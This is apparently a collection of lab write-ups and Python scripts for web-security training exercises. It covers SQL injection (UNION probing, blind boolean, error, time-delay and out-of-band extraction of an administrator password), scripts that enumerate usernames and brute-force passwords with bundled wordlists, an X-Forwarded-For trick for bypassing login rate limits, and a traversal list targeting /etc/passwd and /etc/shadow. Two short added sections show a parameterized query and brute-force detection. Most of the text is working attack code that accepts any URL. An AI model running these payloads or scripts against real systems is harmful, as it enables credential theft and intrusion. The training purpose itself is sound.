First, determine the number of columns returned by the query (`'UNION SELECT NULL,NULL FROM dual--`) and which columns contain text data (`'UNION SELECT 'a','a' FROM dual--`), as we did in the previous labs.

To verify that the query returns two columns, both of which contain text:
`' UNION SELECT 'a','a' FROM DUAL--`

**Note** : _On Oracle databases, every SELECT statement must specify a table to select FROM. If your UNION SELECT attack does not query from a table, you will still need to include the FROM keyword followed by a valid table name. There is a built-in table on Oracle called dual which you can use for this purpose. For example: UNION SELECT 'abc' FROM dual. DUAL is a table automatically created by Oracle Database along with the data dictionary. DUAL is in the schema of the user SYS but is accessible by the name DUAL to all users._

Now use the payload:
```sql
' UNION SELECT BANNER, NULL FROM v$version--
```
_The version information is stored in a table called v$version._
--------------------------------------------------------------------------------
/SQL injection/(PRACTITIONER) Lab : Blind SQL injection with out-of-band interaction.md:
--------------------------------------------------------------------------------
Step 1 : Intercept the request using BurpSuite Pro.

Step 2 : Modify the `TrackingId` cookie, changing it to a payload that will trigger an interaction with the Collaborator server. For example, you can combine SQL injection with basic XXE techniques as follows:
```
' UNION SELECT extractvalue(xmltype(' %remote;]>'),'/l') FROM dual--
```

Step 3: Go to Burp Collaborator Client, copy the subdomain and paste it into the payload. For example:
```
' union SELECT extractvalue(xmltype(' %remote;]>'),'/l') FROM dual--
```

Step 4: Paste it after the `TrackingId` cookie value, URL-encode it, then send.

Step 5: Now go to Burp Collaborator and press 'Poll now' to confirm that a DNS lookup occurred.

Step 6: You will now see the DNS lookup.
--------------------------------------------------------------------------------
/SQL injection/Scripts/Blind SQLi/triggeringConditionalResponses.py:
--------------------------------------------------------------------------------
import sys
import string
import time

import requests

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} domain")
    sys.exit(1)

URL = sys.argv[1]

# Candidate characters tried at each password position
dic = string.ascii_letters + string.digits
response = requests.get(URL)
tracking_id = response.cookies["TrackingId"]
sess_cookie = response.cookies["session"]


def password(url):
    pwd = ""
    i = 1
    while True:
        found_char = False
        print(f"Index : {i}")
        for d in dic:
            # The injected condition is true only when character i of the password equals d
            payload = tracking_id + "' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), " + str(i) + ", 1) = '" + d
            response = requests.get(url, headers={"Cookie": "TrackingId=" + payload + "; session=" + sess_cookie})
            # "Welcome back!" is only rendered when the whole WHERE clause is true
            if "Welcome back!" in response.text:
                pwd += d
                print(pwd)
                found_char = True
                break
        time.sleep(1)
        i += 1

        # No candidate matched: the previous position was the last character
        if not found_char:
            print("Password : ", pwd)
            break


password(URL)
--------------------------------------------------------------------------------
/SQL injection/Scripts/Blind SQLi/triggeringConditionalErrors.py:
--------------------------------------------------------------------------------
import sys
import string
import time

import requests

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} domain")
    sys.exit(1)

URL = sys.argv[1]

# Candidate characters tried at each password position
dic = string.ascii_letters + string.digits
response = requests.get(URL)
tracking_id = response.cookies["TrackingId"]
sess_cookie = response.cookies["session"]


def password(url):
    pwd = ""
    i = 1
    while True:
        found_char = False
        print(f"Index : {i}")
        for d in dic:
            # to_char(1/0) raises a divide-by-zero error only when the condition is true
            payload = tracking_id + "' AND (SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='administrator'), " + str(i) + ",1) = '" + d + "') THEN to_char(1/0) ELSE 'a' END FROM Dual)='a"
            response = requests.get(url, headers={"Cookie": "TrackingId=" + payload + "; session=" + sess_cookie})
            # The database error surfaces as an HTTP 500 page
            if "Internal Server Error" in response.text:
                pwd += d
                print(pwd)
                found_char = True
                break
        time.sleep(1)
        i += 1

        if not found_char:
            print("Password : ", pwd)
            break


password(URL)
--------------------------------------------------------------------------------
/Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via different responses/script.py:
--------------------------------------------------------------------------------
import sys

import requests

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} domain")
    sys.exit(1)

URL = sys.argv[1]

path = "login"
url = URL + path

response = requests.get(url)
sess_cookie = response.cookies["session"]

with open("usernames.txt", "r") as f1:
    unames = [line.strip() for line in f1]
with open("passwords.txt", "r") as f2:
    passwds = [line.strip() for line in f2]

# Username phase: a valid username produces a different error message than an invalid one
usrname = None
for uname in unames:
    data = {'username': uname, 'password': 'test'}
    response2 = requests.post(url=url, data=data, headers={"Cookie": "session=" + sess_cookie})
    print(f"Trying [username : {uname}]")
    if 'Invalid username' not in response2.text:
        usrname = uname
        print(f"\nCorrect username : {usrname}")
        break

if usrname is None:
    print("No username from the list produced a different response")
    sys.exit(1)

# Password phase against the identified username
for pswd in passwds:
    data = {'username': usrname, 'password': pswd}
    response2 = requests.post(url=url, data=data, headers={"Cookie": "session=" + sess_cookie})
    print(f"Trying [username : {usrname} | password : {pswd}]")
    if 'Incorrect password' not in response2.text:
        print("Attack successful")
        print(f"Correct Credentials => [username : {usrname} | password : {pswd}]")
        break
--------------------------------------------------------------------------------
/Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via subtly different responses/script.py:
--------------------------------------------------------------------------------
import sys

import requests

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} domain")
    sys.exit(1)

URL = sys.argv[1]

path = "login"
url = URL + path

response = requests.get(url)
sess_cookie = response.cookies["session"]

with open("usernames.txt", "r") as f1:
    unames = [line.strip() for line in f1]
with open("passwords.txt", "r") as f2:
    passwds = [line.strip() for line in f2]

# Username phase: the message for a valid username differs only by its trailing punctuation
usrname = None
for uname in unames:
    data = {'username': uname, 'password': 'test'}
    response2 = requests.post(url=url, data=data, headers={"Cookie": "session=" + sess_cookie})
    print(f"Trying [username : {uname}]")
    if 'Invalid username or password.' not in response2.text:
        usrname = uname
        print(f"\nCorrect username : {usrname}")
        break

if usrname is None:
    print("No username from the list produced a different response")
    sys.exit(1)

# Password phase against the identified username
for pswd in passwds:
    data = {'username': usrname, 'password': pswd}
    response2 = requests.post(url=url, data=data, headers={"Cookie": "session=" + sess_cookie})
    print(f"Trying [username : {usrname} | password : {pswd}]")
    if 'Invalid username or password ' not in response2.text:
        print("Attack successful")
        print(f"Correct Credentials => [username : {usrname} | password : {pswd}]")
        break
--------------------------------------------------------------------------------
/SQL injection/Scripts/Blind SQLi/usingTimeDelay.py:
--------------------------------------------------------------------------------
import sys
import string
import time

import requests

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} domain")
    sys.exit(1)

URL = sys.argv[1]

# Candidate characters tried at each password position
dic = string.ascii_letters + string.digits
response = requests.get(URL)
tracking_id = response.cookies["TrackingId"]
sess_cookie = response.cookies["session"]


def password(url):
    pwd = ""
    i = 1
    while True:
        found_char = False
        print(f"Index : {i}")
        for d in dic:
            # pg_sleep(5) runs only when character i of the password equals d
            payload = tracking_id + "'||(SELECT CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), " + str(i) + ", 1) = '" + d + "') THEN pg_sleep(5) ELSE NULL END)--"
            start = time.time()
            response = requests.get(url, headers={"Cookie": "TrackingId=" + payload + "; session=" + sess_cookie})
            end = time.time()

            # A response delayed by at least the sleep time means the condition was true
            delay = end - start
            if delay >= 5:
                pwd += d
                print(pwd)
                found_char = True
                break
        time.sleep(1)
        i += 1

        if not found_char:
            print("Password : ", pwd)
            break


password(URL)
--------------------------------------------------------------------------------
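The three blind SQLi scripts above all depend on the application concatenating the TrackingId cookie into its SQL text. As an added example that is not part of this repository, here is that lookup pattern beside a parameterized version, backed by an in-memory SQLite table with constructed rows; the `' AND '1'='1` / `' AND '1'='2` probes and the SUBSTRING-style character test from the labs distinguish the two.

```python
import sqlite3

# Constructed sample rows standing in for the lab's tracking-cookie table
SAMPLE_ROWS = [("abc123", "alice"), ("xyz789", "bob")]


def _connect():
    """Fresh in-memory database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tracking (TrackingId TEXT, user TEXT)")
    conn.executemany("INSERT INTO tracking VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(tracking_id):
    """String concatenation: the cookie value becomes part of the SQL statement."""
    conn = _connect()
    query = "SELECT user FROM tracking WHERE TrackingId = '" + tracking_id + "'"
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error:
        # A database error is itself an oracle in the conditional-errors variant
        return None
    return [r[0] for r in rows]


def lookup_parameterized(tracking_id):
    """Bound parameter: the cookie value is compared as data and never parsed as SQL."""
    conn = _connect()
    rows = conn.execute(
        "SELECT user FROM tracking WHERE TrackingId = ?", (tracking_id,)
    ).fetchall()
    return [r[0] for r in rows]


def welcome_banner(lookup, tracking_id):
    """Mimics the lab page: 'Welcome back!' is rendered only when the lookup returns a row."""
    rows = lookup(tracking_id)
    return "Welcome back!" if rows else ""
```

With the parameterized lookup the injected condition never changes the banner, so the character-by-character oracle the scripts rely on disappears.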
/Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via different responses/usernames.txt:
--------------------------------------------------------------------------------
carlos
root
admin
test
guest
info
adm
mysql
user
administrator
oracle
ftp
pi
puppet
ansible
ec2-user
vagrant
azureuser
academico
acceso
access
accounting
accounts
acid
activestat
ad
adam
adkit
admin
administracion
administrador
administrator
administrators
admins
ads
adserver
adsl
ae
af
affiliate
affiliates
afiliados
ag
agenda
agent
ai
aix
ajax
ak
akamai
al
alabama
alaska
albuquerque
alerts
alpha
alterwind
am
amarillo
americas
an
anaheim
analyzer
announce
announcements
antivirus
ao
ap
apache
apollo
app
app01
app1
apple
application
applications
apps
appserver
aq
ar
archie
arcsight
argentina
arizona
arkansas
arlington
as
as400
asia
asterix
at
athena
atlanta
atlas
att
au
auction
austin
auth
auto
autodiscover
--------------------------------------------------------------------------------
/Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via different responses/passwords.txt:
--------------------------------------------------------------------------------
123456
password
12345678
qwerty
123456789
12345
1234
111111
1234567
dragon
123123
baseball
abc123
football
monkey
letmein
shadow
master
666666
qwertyuiop
123321
mustang
1234567890
michael
654321
superman
1qaz2wsx
7777777
121212
000000
qazwsx
123qwe
killer
trustno1
jordan
jennifer
zxcvbnm
asdfgh
hunter
buster
soccer
harley
batman
andrew
tigger
sunshine
iloveyou
2000
charlie
robert
thomas
hockey
ranger
daniel
starwars
klaster
112233
george
computer
michelle
jessica
pepper
1111
zxcvbn
555555
11111111
131313
freedom
777777
pass
maggie
159753
aaaaaa
ginger
princess
joshua
cheese
amanda
summer
love
ashley
nicole
chelsea
biteme
matthew
access
yankees
987654321
dallas
austin
thunder
taylor
matrix
mobilemail
mom
monitor
monitoring
montana
moon
moscow
--------------------------------------------------------------------------------
/Authentication vulnerabilities/Vulnerabilities in password-based login/Username enumeration via different responses.md:
--------------------------------------------------------------------------------
Step 1 : Navigate to the login page of the given lab.

Step 2 : Enter any random `username` and `password`, send the request, and in parallel intercept it using BurpSuite.

Step 3 : Send this intercepted request to the `Intruder` tab.

Step 4 : Choose the attack type `Sniper` and click on `Clear §`. Then select the value of the `username` parameter and click on `Add §`. Next, go to the `Payloads` sub-tab, choose the payload type `Simple List` and paste the given usernames list into the `Payload Options` box. Now go back to the `Positions` tab and click on `Start Attack`. The attack will start in a new window. You can now observe the difference between a correct and an incorrect username on the basis of status code, length, error message or timeout. In this lab, clicking on the `Length` column heading sorts the results so that the outlier stands out.

Step 5 : We observe that the payload `akamai` (in this case only) has a different length than the other payloads. We can check it by entering `affiliate` as the username and something random as the password: the response says `Incorrect Password` instead of `Incorrect Username`, which confirms that we are on the right path.

Step 6 : Repeat Step 4 for the password, but enter the username that you found in the steps above.

Step 7 : Observe the status code. The one with a different status code is the correct password. Log in to the given page to complete the lab.
--------------------------------------------------------------------------------
/Authentication vulnerabilities/Vulnerabilities in password-based login/Username enumeration via subtly different responses.md:
--------------------------------------------------------------------------------
Step 1 : Navigate to the login page of the given lab.

Step 2 : Enter any random `username` and `password`, send the request, and in parallel intercept it using BurpSuite.

Step 3 : Send this intercepted request to the `Intruder` tab.

Step 4 : Choose the attack type `Sniper` and click on `Clear §`. Then select the value of the `username` parameter and click on `Add §`. Next, go to the `Payloads` sub-tab, choose the payload type `Simple List` and paste the given usernames list into the `Payload Options` box. Next, go to the `Options` tab and under `Grep - Extract` click `Add`. In the dialog box that appears, scroll down, highlight the text `Invalid username or password.` and click `OK`. Now go back to the `Positions` tab and click on `Start Attack`. The attack will start in a new window. You can now observe the difference between a correct and an incorrect username on the basis of status code, length, error message or timeout. In this lab, we will check the error message.

Step 5 : When the attack is finished, there is an additional column containing the `error message` you extracted. Sort the results using this column to notice that one of them is subtly different. We observe that the payload `ads` (in this case only) has a different error message (basically a typo) than the other payloads.

Step 6 : Repeat Step 4 for the password, but enter the username that you found in the steps above.

Step 7 : Observe the error message. The one with no error message is the correct password. Log in to the given page to complete the lab.
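Detection logic for the two login patterns described in the enumeration writeups above, as an added example that is not part of this repository: it runs over constructed audit lines, groups by the socket source address rather than any client-supplied header such as X-Forwarded-For, and flags a burst of failures spread across many usernames and a burst of failures that rotates the forwarded-for value. The log format and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed login-audit lines (not the lab's real logs). Fields:
# timestamp, socket source IP, X-Forwarded-For value ("-" if absent), username, outcome
SAMPLE_LOG = """\
2024-01-01T10:00:00 203.0.113.5 - carlos FAIL
2024-01-01T10:00:01 203.0.113.5 - root FAIL
2024-01-01T10:00:02 203.0.113.5 - admin FAIL
2024-01-01T10:00:03 203.0.113.5 - test FAIL
2024-01-01T10:00:04 203.0.113.5 - guest FAIL
2024-01-01T10:00:05 203.0.113.5 - akamai FAIL
2024-01-01T10:00:30 198.51.100.7 1.1.1.1 wiener FAIL
2024-01-01T10:00:31 198.51.100.7 1.1.1.2 wiener FAIL
2024-01-01T10:00:32 198.51.100.7 1.1.1.3 wiener FAIL
2024-01-01T10:00:33 198.51.100.7 1.1.1.4 wiener FAIL
2024-01-01T10:00:34 198.51.100.7 1.1.1.5 wiener OK
2024-01-01T10:05:00 192.0.2.9 - wiener FAIL
2024-01-01T10:05:20 192.0.2.9 - wiener OK
"""

# Assumed thresholds; tune to the application's normal traffic
WINDOW = timedelta(minutes=1)
MAX_DISTINCT_USERS = 5   # failures against more usernames than this from one address
MAX_DISTINCT_XFF = 3     # failures carrying more X-Forwarded-For values than this from one address


def parse(log_text):
    """Return (timestamp, src_ip, xff, username, outcome) tuples."""
    events = []
    for line in log_text.splitlines():
        ts, src, xff, user, outcome = line.split()
        events.append((datetime.fromisoformat(ts), src, xff, user, outcome))
    return events


def detect(log_text):
    """Map each socket source IP to the set of findings raised against it.

    Grouping is by the TCP peer address, not by X-Forwarded-For: that header is
    client-supplied, so a per-header counter is exactly what rotating it defeats.
    """
    by_src = defaultdict(list)
    for ev in parse(log_text):
        by_src[ev[1]].append(ev)

    findings = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e[0])
        flags = set()
        for idx, current in enumerate(evs):
            # Failures from this address in the WINDOW ending at the current event
            recent = [e for e in evs[:idx + 1]
                      if current[0] - e[0] <= WINDOW and e[4] == "FAIL"]
            if len({e[3] for e in recent}) > MAX_DISTINCT_USERS:
                flags.add("username_enumeration")
            if len({e[2] for e in recent if e[2] != "-"}) > MAX_DISTINCT_XFF:
                flags.add("xff_rotation")
        if flags:
            findings[src] = flags
    return findings
```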
--------------------------------------------------------------------------------
/SQL injection/(PRACTITIONER) Lab : Blind SQL injection with out-of-band data exfiltration.md:
--------------------------------------------------------------------------------
Step 1 : Intercept the request using BurpSuite Pro.

Step 2 : Modify the TrackingId cookie, changing it to a payload that will trigger an interaction with the Collaborator server. For example, you can combine SQL injection with basic XXE techniques as follows:
```
' UNION SELECT extractvalue(xmltype(' %remote;]>'),'/l') FROM dual--
```

Step 3: Go to the Burp Collaborator client, copy the subdomain and paste it into the payload. For example:
```
' UNION SELECT extractvalue(xmltype(' %remote;]>'),'/l') FROM dual--
```

Step 4: Paste it after the TrackingId cookie value, URL encode it, then send.

Step 5: Now go to Burp Collaborator and press 'Poll now' to confirm that a DNS lookup occurred.

Step 6: You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The password of the administrator user should appear in the subdomain of the interaction, and you can view this within the Burp Collaborator client. For DNS interactions, the full domain name that was looked up is shown in the Description tab. For HTTP interactions, the full domain name is shown in the Host header in the Request to Collaborator tab.

Step 7: Click "My account" to open the login page. Use the password to log in as the administrator user.
--------------------------------------------------------------------------------
/SQL injection/(PRACTITIONER) Lab : Blind SQL injection with conditional responses.md:
--------------------------------------------------------------------------------
In this lab the `TrackingId` cookie is vulnerable to `SQL Injection`.

You can check this by sending the following statements appended to the value of the `TrackingId` cookie:
```sql
' AND '1'='1 #This will print "Welcome Back"
' AND '1'='2 #This will not print "Welcome Back"
```

We can systematically determine the password for the given user `administrator` by sending a series of inputs that test the password one character at a time:
```sql
' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 'char
```

You can use the following script to find the password:
```python
import sys
import string
import time

import requests

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} domain")
    sys.exit(1)

URL = sys.argv[1]

# Candidate characters tried at each password position
dic = string.ascii_letters + string.digits
response = requests.get(URL)
tracking_id = response.cookies["TrackingId"]
sess_cookie = response.cookies["session"]


def password(url):
    pwd = ""
    i = 1
    while True:
        found_char = False
        print(f"Index : {i}")
        for d in dic:
            # The injected condition is true only when character i of the password equals d
            payload = tracking_id + "' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), " + str(i) + ", 1) = '" + d
            response = requests.get(url, headers={"Cookie": "TrackingId=" + payload + "; session=" + sess_cookie})
            # "Welcome back!" is only rendered when the whole WHERE clause is true
            if "Welcome back!" in response.text:
                pwd += d
                print(pwd)
                found_char = True
                break
        time.sleep(1)
        i += 1

        # No candidate matched: the previous position was the last character
        if not found_char:
            print("Password : ", pwd)
            break


password(URL)
```
--------------------------------------------------------------------------------
/Authentication vulnerabilities/Vulnerabilities in password-based login/Username enumeration via response timing.md:
--------------------------------------------------------------------------------
Step 1 : Navigate to the login page of the given lab.

Step 2 : Enter any random `username` and `password`, send the request, and in parallel intercept it using BurpSuite.

Step 3 : Send this intercepted request to the `Intruder` tab.

Step 4 : Choose the attack type `Sniper` and click on `Clear §`. Then select the value of the `username` parameter and click on `Add §`. Next, go to the `Payloads` sub-tab, choose the payload type `Simple List` and paste the given usernames list into the `Payload Options` box. Next, go to the `Options` tab and under `Grep - Extract` click `Add`. In the dialog box that appears, scroll down, highlight the text `Invalid username or password.` and click `OK`. Now go back to the `Positions` tab and click on `Start Attack`. The attack will start in a new window. You can now observe the difference between a correct and an incorrect username on the basis of status code, length, error message or timeout. In this lab, we will check the error message. Among these error messages we will notice `You have made too many incorrect login attempts. Please try again in 30 minute(s)` as the response, so it may be that our IP address is being blocked because of the many requests sent at once.

Step 5 : Identify that the `X-Forwarded-For` header is supported, which allows you to spoof your IP address and bypass the IP-based brute-force protection.

Step 6 : Send the request to Burp Intruder and set the attack type to `Pitchfork`. Clear the default payload positions and add the X-Forwarded-For header. Add payload positions for the X-Forwarded-For header and the username.

Step 7 : On the Payloads tab, select payload set 1. Select the Numbers payload type. Enter the range 1 - 100 and set the step to 1. Set the max fraction digits to 0. This will be used to spoof your IP. Select payload set 2 and add the list of usernames. Start the attack.

Step 8 : Notice that one of the response times was significantly longer than the others. Repeat this request a few times to make sure it consistently takes longer, then make a note of this username.

Step 9 : Repeat Steps 5, 6 and 7 for the password, but enter the username that you found in the steps above.

Step 10 : Observe the status code. Log in to the given page to complete the lab.
--------------------------------------------------------------------------------
/SQL injection/(APPRENTICE) Lab : Blind SQL injection with conditional errors.md:
--------------------------------------------------------------------------------
In this lab the `TrackingId` cookie is vulnerable to `SQL Injection`.

You can check this by sending the following statements appended to the value of the `TrackingId` cookie:
```sql
' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
```
These inputs use the CASE keyword to test a condition and return a different expression depending on whether the condition is true. With the first input, the CASE expression evaluates to 'a', which does not cause any error. With the second input, it evaluates to 1/0, which causes a divide-by-zero error. Assuming the error causes some difference in the application's HTTP response, we can use this difference to infer whether the injected condition is true.

We can systematically determine the password for the given user `administrator` by sending a series of inputs that test the password one character at a time:
```sql
' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') THEN 1/0 ELSE 'a' END FROM Users)='a
```

You can use the following script to find the password:
```python
import sys
import string
import time

import requests

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} domain")
    sys.exit(1)

URL = sys.argv[1]

# Candidate characters tried at each password position
dic = string.ascii_letters + string.digits
response = requests.get(URL)
tracking_id = response.cookies["TrackingId"]
sess_cookie = response.cookies["session"]


def password(url):
    pwd = ""
    i = 1
    while True:
        found_char = False
        print(f"Index : {i}")
        for d in dic:
            # to_char(1/0) raises a divide-by-zero error only when the condition is true
            payload = tracking_id + "' AND (SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='administrator'), " + str(i) + ",1) = '" + d + "') THEN to_char(1/0) ELSE 'a' END FROM Dual)='a"
            response = requests.get(url, headers={"Cookie": "TrackingId=" + payload + "; session=" + sess_cookie})
            # The database error surfaces as an HTTP 500 page
            if "Internal Server Error" in response.text:
                pwd += d
                print(pwd)
                found_char = True
                break
        time.sleep(1)
        i += 1

        if not found_char:
            print("Password : ", pwd)
            break


password(URL)
```
--------------------------------------------------------------------------------
/SQL injection/(PRACTITIONER) Lab : Blind SQL injection with time delays and information retrieval.md:
--------------------------------------------------------------------------------
In this lab the `TrackingId` cookie is vulnerable to `SQL Injection`.

You can check this by sending the following statements appended to the value of the `TrackingId` cookie:
```sql
';SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END-- #This will delay the response by 10 sec
URL encoded : '%3bSELECT+CASE+WHEN+(1%3d1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
```

You can check whether the username 'administrator' exists by sending the following statements appended to the value of the `TrackingId` cookie:
```sql
';SELECT CASE WHEN (username='administrator') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-- #If the response comes after 10 sec, then username='administrator' exists
URL encoded : '%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
```

We can systematically determine the password for the given user `administrator` by sending a series of inputs that test the password one character at a time, where i is the character position and char the candidate character:
```sql
'||(SELECT CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), i, 1) = 'char') THEN pg_sleep(5) ELSE NULL END)--
```

You can use the following script to find the password:
```python
import sys
import string
import time

import requests

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} domain")
    sys.exit(1)

URL = sys.argv[1]

# Candidate characters tried at each password position
dic = string.ascii_letters + string.digits
response = requests.get(URL)
tracking_id = response.cookies["TrackingId"]
sess_cookie = response.cookies["session"]


def password(url):
    pwd = ""
    i = 1
    while True:
        found_char = False
        print(f"Index : {i}")
        for d in dic:
            # pg_sleep(5) runs only when character i of the password equals d
            payload = tracking_id + "'||(SELECT CASE WHEN (SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), " + str(i) + ", 1) = '" + d + "') THEN pg_sleep(5) ELSE NULL END)--"
            start = time.time()
            response = requests.get(url, headers={"Cookie": "TrackingId=" + payload + "; session=" + sess_cookie})
            end = time.time()

            # A response delayed by at least the sleep time means the condition was true
            delay = end - start
            if delay >= 5:
                pwd += d
                print(pwd)
                found_char = True
                break
        time.sleep(1)
        i += 1

        if not found_char:
            print("Password : ", pwd)
            break


password(URL)
```
--------------------------------------------------------------------------------
/SQL injection/Scripts/For Microsoft OR MySQL Database/script.py:
--------------------------------------------------------------------------------
import sys

import requests

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} url")
    sys.exit(1)

URL = sys.argv[1]  # full URL of the injectable parameter, the payload is appended to it


def findCols(url):
    """Increase the ORDER BY index until the server errors; the last working index is the column count."""
    i = 1
    cols = 0
    while True:
        payload = "' ORDER BY +" + str(i) + "--+"
        response = requests.get(url + payload)
        if response.status_code != 200:
            cols = i - 1
            break
        i += 1
    return cols


def findColsNull(url):
    """Add NULLs to a UNION SELECT until the query succeeds; that count is the column count."""
    i = 1
    cols = 0
    while True:
        payload = url + "' UNION SELECT " + "NULL," * i + "--+"
        payload = payload[:-4] + payload[-3:]  # drop the trailing comma before the comment
        response = requests.get(payload)
        if response.status_code == 200:
            cols = i
            break
        i += 1
    return cols


def checkCol(url):
    """Replace each NULL in turn with a string; a 200 response means that column accepts text."""
    cols = findCols(url)
    strlist = []
    payload1 = url
    payload2 = "' UNION SELECT " + "NULL," * cols + "--+"
    for i in range(15, len(payload2), 5):  # each "NULL," is 5 characters, starting at offset 15
        if "NULL" in payload2[i:]:
            mpayload = payload2[:i] + "'a'," + payload2[(i + 5):]
            mpayload = mpayload[:-4] + mpayload[-3:]
            response = requests.get(payload1 + mpayload)
            if response.status_code == 200:
                strlist.append(1)
            else:
                strlist.append(0)
    for i in range(len(strlist)):
        if strlist[i] == 1:
            print("Column " + str(i + 1) + " contains text")


def checkVersion(url):
    """Put @@version in the first column; only Microsoft SQL Server and MySQL accept it."""
    cols = findCols(url)
    payload = "'UNION SELECT @@version" + ",NULL" * (cols - 1) + "--+"
    response = requests.get(url + payload)
    if response.status_code == 200:
        print("It's either Microsoft or MySQL Database")
    else:
        print("It's neither Microsoft nor MySQL Database")
    print()
    print("Do You still want to know the version of database? (Press 1 for Yes else press any other number)")
    choice = int(input())
    if choice == 1:
        print("\n\nThank You for using this script\n\n")
        print("********************Check the VERSION in response text below**********************\n\n\n\n")
        print(response.text)
    else:
        print("Thank You for using this script")


def choiceDecider():
    while True:
        print("\n\n\nPress 1 for finding number of Columns using 'ORDER BY' \nPress 2 for finding number of Columns using 'UNION SELECT' \nPress 3 for finding columns that contains text \nPress 4 for finding type and version of database\nPress 5 to exit")
        choice = int(input())
        if choice == 1:
            print("Number of Columns : ", findCols(URL))
        elif choice == 2:
            print("Number of Columns : ", findColsNull(URL))
        elif choice == 3:
            checkCol(URL)
        elif choice == 4:
            checkVersion(URL)
        elif choice == 5:
            sys.exit()
        else:
            print("WRONG CHOICE")


choiceDecider()
--------------------------------------------------------------------------------
/SQL injection/Scripts/For Oracle Database/script.py:
--------------------------------------------------------------------------------
import sys

import requests

if len(sys.argv) != 2:
    print(f"USAGE: {sys.argv[0]} url")
    sys.exit(1)

URL = sys.argv[1]  # full URL of the injectable parameter, the payload is appended to it


def findCols(url):
    """Increase the ORDER BY index until the server errors; the last working index is the column count."""
    i = 1
    cols = 0
    while True:
        payload = "' ORDER BY +" + str(i) + "--"
        response = requests.get(url + payload)
        if response.status_code != 200:
            cols = i - 1
            break
        i += 1
    return cols


def findColsNull(url):
    """Add NULLs to a UNION SELECT ... FROM dual until the query succeeds; that count is the column count."""
    i = 1
    cols = 0
    while True:
        payload = url + "' UNION SELECT " + "NULL," * i + " FROM dual--"
        payload = payload[:-13] + payload[-12:]  # drop the trailing comma before " FROM dual--"
        response = requests.get(payload)
        if response.status_code == 200:
            cols = i
            break
        i += 1
    return cols


def checkCol(url):
    """Replace each NULL in turn with a string; a 200 response means that column accepts text."""
    cols = findCols(url)
    strlist = []
    payload1 = url
    payload2 = "' UNION SELECT " + "NULL," * cols + " FROM dual--"
    for i in range(15, len(payload2), 5):  # each "NULL," is 5 characters, starting at offset 15
        if "NULL" in payload2[i:]:
            mpayload = payload2[:i] + "'a'," + payload2[(i + 5):]
            mpayload = mpayload[:-13] + mpayload[-12:]
            response = requests.get(payload1 + mpayload)
            if response.status_code == 200:
                strlist.append(1)
            else:
                strlist.append(0)
    for i in range(len(strlist)):
        if strlist[i] == 1:
            print("Column " + str(i + 1) + " contains text")


def checkVersion(url):
    """Select BANNER from v$version in the first column; only Oracle has that view."""
    cols = findCols(url)
    payload = "'UNION SELECT BANNER" + ",NULL" * (cols - 1) + " FROM v$version--"
    print(payload)
    response = requests.get(url + payload)
    print(response.status_code)
    if response.status_code == 200:
        print("It's Oracle Database")
    else:
        print("It's NOT Oracle Database")
    print()
    print("Do You still want to know the version of database? (Press 1 for Yes else press any other number)")
    choice = int(input())
    if choice == 1:
        print("\n\nThank You for using this script\n\n")
        print("********************Check the VERSION in response text below**********************\n\n\n\n")
        print(response.text)
    else:
        print("Thank You for using this script")


def choiceDecider():
    while True:
        print("\n\n\nPress 1 for finding number of Columns using 'ORDER BY' \nPress 2 for finding number of Columns using 'UNION SELECT' \nPress 3 for finding columns that contains text \nPress 4 for finding type and version of database\nPress 5 to exit")
        choice = int(input())
        if choice == 1:
            print("Number of Columns : ", findCols(URL))
        elif choice == 2:
            print("Number of Columns : ", findColsNull(URL))
        elif choice == 3:
            checkCol(URL)
        elif choice == 4:
            checkVersion(URL)
        elif choice == 5:
            sys.exit()
        else:
            print("WRONG CHOICE")


choiceDecider()
--------------------------------------------------------------------------------
/Directory traversal/Script/dirlist.txt:
--------------------------------------------------------------------------------
/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow%00
/etc/passwd
/etc/passwd%00
../etc/passwd
../etc/passwd%00
../../etc/passwd
../../etc/passwd%00
../../../etc/passwd
../../../etc/passwd%00
../../../../etc/passwd
../../../../etc/passwd%00
../../../../../etc/passwd
../../../../../etc/passwd%00
../../../../../../etc/passwd
../../../../../../etc/passwd%00
../../../../../../../etc/passwd
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd%00
